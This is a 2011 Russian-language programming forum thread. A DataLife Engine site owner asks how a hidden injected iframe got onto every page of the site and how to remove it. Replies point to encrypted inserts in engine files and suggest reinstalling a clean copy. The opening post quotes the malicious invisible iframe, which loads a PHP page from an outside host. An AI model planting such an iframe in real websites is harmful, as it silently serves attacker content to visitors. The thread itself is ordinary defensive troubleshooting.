Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > WordPress и другие CMS
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 02.03.2011, 19:43   #1
demiancz
Форумчанин
 
Регистрация: 28.09.2010
Сообщений: 246
По умолчанию Взлом сайта ДЛЕ

Здравствуйте на моем сайте появился сторонний код такого вида <iframe src="хттп://throatbank.com/srv/kmftglhrcmhrinboyrh.php?n=wild" style="display:none" width="0" height="0"></iframe>
в самом верху всех страниц сайта. Понятное дело что этот код подгружается не из шаблона. Потому как попробовал менять шаблоны - результат один и тот же. В PHPmyAdmin тоже этот код не нашел.

Помогите пожалуйста. Как удалить эту заразу? И как вообще он туда попал? Вот мой сайт хттп://kinobum.info/
Очень надеюсь на помощь!
Смотреть фильмы HD Фильмы для планшетов
demiancz вне форума Ответить с цитированием
Старый 02.03.2011, 21:07   #2
KREGI
Форумчанин
 
Аватар для KREGI
 
Регистрация: 29.11.2008
Сообщений: 333
По умолчанию

мб хостер рекламу распологает?
Если помог - Весы слева
KREGI вне форума Ответить с цитированием
Старый 02.03.2011, 23:56   #3
KLAXON
Пользователь
 
Регистрация: 17.06.2010
Сообщений: 50
По умолчанию

суппорт хостинга что говорит?
KLAXON вне форума Ответить с цитированием
Старый 03.03.2011, 00:02   #4
bananasus
Пользователь
 
Аватар для bananasus
 
Регистрация: 24.01.2011
Сообщений: 67
По умолчанию

Эт не в templates надо искать. Такие вещи в файлы движка суют, причем зашифрованные. Версия твоего двига?
bananasus вне форума Ответить с цитированием
Старый 03.03.2011, 00:12   #5
KLAXON
Пользователь
 
Регистрация: 17.06.2010
Сообщений: 50
По умолчанию

Цитата:
Сообщение от bananasus Посмотреть сообщение
Эт не в templates надо искать. Такие вещи в файлы движка суют, причем зашифрованные. Версия твоего двига?
и я бы еще попытался на его месте вспомнить, откуда качал движок. с офиц сайта разработчика или же откуда-то еще
KLAXON вне форума Ответить с цитированием
Старый 03.03.2011, 22:42   #6
bananasus
Пользователь
 
Аватар для bananasus
 
Регистрация: 24.01.2011
Сообщений: 67
По умолчанию

С офф сайта можно скачать если у тебя есть лицензия.
Я бы посоветовал снести нафик движок и поставить чистую версию без шелов и прочего мусора. Или позаменять поочередно файлы старого двига, пока не исчезнет код.
bananasus вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как на дле разных категориях выводить разное количество похожих новостей у новости? pq777pq PHP 1 02.07.2011 00:49
парсер новостей по ДЛЕ сайтах (с доп.функционалом) designer999 Фриланс 1 19.09.2010 20:35
дле последние новости sergeiqwe PHP 0 11.09.2010 13:29